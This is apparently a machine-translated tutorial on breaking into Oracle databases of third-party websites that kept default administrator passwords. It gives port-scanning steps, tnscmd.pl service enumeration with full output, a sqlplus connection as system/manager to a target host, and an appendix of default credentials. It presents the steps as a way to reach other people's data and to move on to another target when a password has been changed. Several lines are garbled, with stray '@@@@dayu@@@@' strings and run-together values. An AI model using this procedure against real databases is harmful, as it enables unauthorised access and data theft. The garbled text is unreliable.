Database security risks caused by default Oracle Administrators

By default, the administrator password of Oracle is fixed to facilitate installation and debugging. In the Oracle database, two users with DBA permissions, Sys and System. I found that Oracle databases on many Chinese websites did not change the passwords of these two users, including many large e-commerce websites, we can use this default password to find things we are interested in.

Before testing, we first need to know some relevant knowledge. When we connect to an Oracle database, we need to know its service_name or Sid value, just like mssql. We need to know the database name. So how can we know? Obviously, this is not the case. Here we will first talk about oracle's TNSlistener, which is located between the database Client and the database Server. By default, it listens to port 1521, which can be changed. However, if you use a tcp session to connect to port 1521, oracle will not return its banner. If you enter something, it may even kick you out. Here we need to use tnscmd. pl is a perl program. It can query whether the remote oracle database is enabled (that is, ping), query the version, and query its service name, service status, and database service name, and the accuracy is very high.

If there is anything you don't know about the theory, you can find the relevant materials. Start testing now. The required tools include ActivePerl, Oracle client, Superscan or other software for port scanning, Tnscmd. pl. we first use Superscan to scan hosts opened on port 1521, assuming the IP address is xx. xx.110.110. What we need to do is to use Tnscmd. pl to query the service name of the remote database. The usage of Tnscmd. pl is as follows:

 
 

  
  
C:\perl\bin@@@@dayu@@@@perl tnscmd.pl   
  
  
usage: tnscmd.pl [command] -h hostname   
  
  
where "command" is something like ping, version, status,etc.   
  
  
(default is ping)   
  
  
[-p port] - alternate TCP port to use (default is 1521)   
  
  
[--logfile logfile] - write raw packets to specifiedlogfile   
  
  
[--indent] - indent & outdent on parens   
  
  
[--rawcmd command] - build your own CONNECT_DATA string   
  
  
[--cmdsize bytes] - fake TNS command size (revealspacketleakage)   
  
  
 
 
 

Below we only use a few simple commands, and other commands are also very useful. Let's explore them together.

Then we will:

 
 

  
  
C:\perl\bin@@@@dayu@@@@perl tnscmd.pl services -hxx.xx.110.110-p 1521 –indent   
  
  
sending (CONNECT_DATA=(COMMAND=services))toxx.xx.110.110:1521   
  
  
writing 91 bytes   
  
  
reading   
  
  
._.......6.........?. ..........   
  
  
DETION=   
  
  
TMP=   
  
  
VSNNUM=135286784   
  
  
ERR=0   
  
  
SERVICES_EXIST=1   
  
  
.Q........   
  
  
SERVICE=   
  
  
SERVICE_NAME=ORCL   
  
  
INSTANCE=   
  
  
INSTANCE_NAME=ORCL   
  
  
NUM=1   
  
  
INSTANCE_CLASS=ORACLE   
  
  
HANDLER=   
  
  
HANDLER_DISPLAY=DEDICATED SERVER   
  
  
STA=ready   
  
  
HANDLER_INFO=LOCAL SERVER   
  
  
HANDLER_MAXLOAD=0   
  
  
HANDLER_LOAD=0   
  
  
ESTABLISHED=447278   
  
  
REFUSED=0   
  
  
HANDLER_ID=8CA61D1BBDA6-3F5C-E030-813DF5430227   
  
  
HANDLER_NAME=DEDICATED   
  
  
ADDRESS=   
  
  
PROTOCOL=beq   
  
  
PROGRAM=/home/oracle/bin/oracle   
  
  
ENVS="ORACLE_HOME=/home/oracle,ORACLE_SID=ORCL"   
  
  
ARGV0=oracleORCL   
  
  
ARGS="   
  
  
LOCAL=NO   
  
  
"   
  
  
.........@   
  
  
 
 
 

From the above information, we can see that the database service is named ORCL, and then we can remotely connect to it through the sqlplus tool, use the default system/manager or sys/managerOracle Administrator as the username and password, and use other commands such as mdsys/mdsys and ctxsys/ctxsys, the Default User and password change with the version. As follows:

 
 

  
  
C:\oracle\ora90\BIN@@@@dayu@@@@sqlplus /nolog   
  
  
SQL*Plus: Release 9.0.1.0.1 - Production on Thu May 2311:36:592002   
  
  
(c) Copycenter 2001 Oracle Corporation.　All centersreserved.   
  
  
SQL@@@@dayu@@@@connect system/manager@   
  
  
(detion=(address_list=(address=(protocol=tcp)   
  
  
(host=xx.xx.110.110)(port=1521)))   
  
  
(connect_data=(SERVICE_NAME=ORCL)));   
  
  
 
 
 

If the password is correct, the system will prompt connected. If not, change the default user name and password. After my attempt, dbsnmp and dbsnmp can be used. Of course, if the other party has changed the default password, we can only change to another target. However, I found that many of them do not change. This is a security awareness problem.

Appendix Oracle Default Administrator Password

1.
Username: sys
Password: change_on_install

2.
User name: system
Password: manager

3.
Username: scott
Password: tiger

1. How to unlock users in Oracle
2. Five-minute master of Oracle tablespace
3. Authorization and management for five Oracle users
4. Oracle administrator Manual: database management tools
5. Step 4: Change the Oracle user name